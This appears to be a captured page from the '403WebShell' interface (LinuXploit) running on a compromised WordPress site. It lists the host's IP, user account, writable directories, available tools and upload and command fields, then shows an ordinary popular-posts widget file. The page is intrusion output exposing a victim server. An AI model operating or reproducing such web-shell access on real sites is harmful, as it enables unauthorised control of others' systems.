Uname:Linux webm009.cluster131.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64

403WebShell
403Webshell
Server IP : 146.59.209.152  /  Your IP : 216.73.216.25
Web Server : Apache
System : Linux webm009.cluster131.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : monpetu ( 144298)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/monpetu/www/leoreno.fr/wp-content/plugins/buildexo-plugin/templates/widgets/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/monpetu/www/leoreno.fr/wp-content/plugins/buildexo-plugin/templates/widgets/popular-posts.php
<?php

$query_string = 'posts_per_page=' . $instance['number'];
if ($instance['cat']) {
    $query_string .= '&cat=' . $instance['cat'];
}
$query = new WP_Query($query_string);

extract($args);
$title = apply_filters('widget_title', $instance['title']);

echo wp_kses_post($before_widget); ?>

<div class="footer__widget-blog">
    <div class="widget-heading mb-40">
        <?php echo wp_kses_post($before_title . $title . $after_title); ?>
    </div>
    <div class="blog-widget">
        <?php while( $query->have_posts() ): $query->the_post(); ?>
        <div class="blog-widget__item ul_li">
            <div class="thumb">
                <a href="<?php echo esc_url(get_the_permalink(get_the_id()));?>"><?php the_post_thumbnail('turner_85x75'); ?></a>
            </div>
            <div class="content">
                <span> <?php echo get_the_date();?> </span>
                <h3 class="border_effect"><a href="<?php echo esc_url(get_the_permalink(get_the_id()));?>"><?php echo wp_trim_words( get_the_title(), 6, '.' );?></a></h3>
            </div>
        </div>
        <?php endwhile; ?>
    </div>
</div>

<?php echo wp_kses_post($after_widget);

Youez - 2016 - github.com/yon3zu
LinuXploit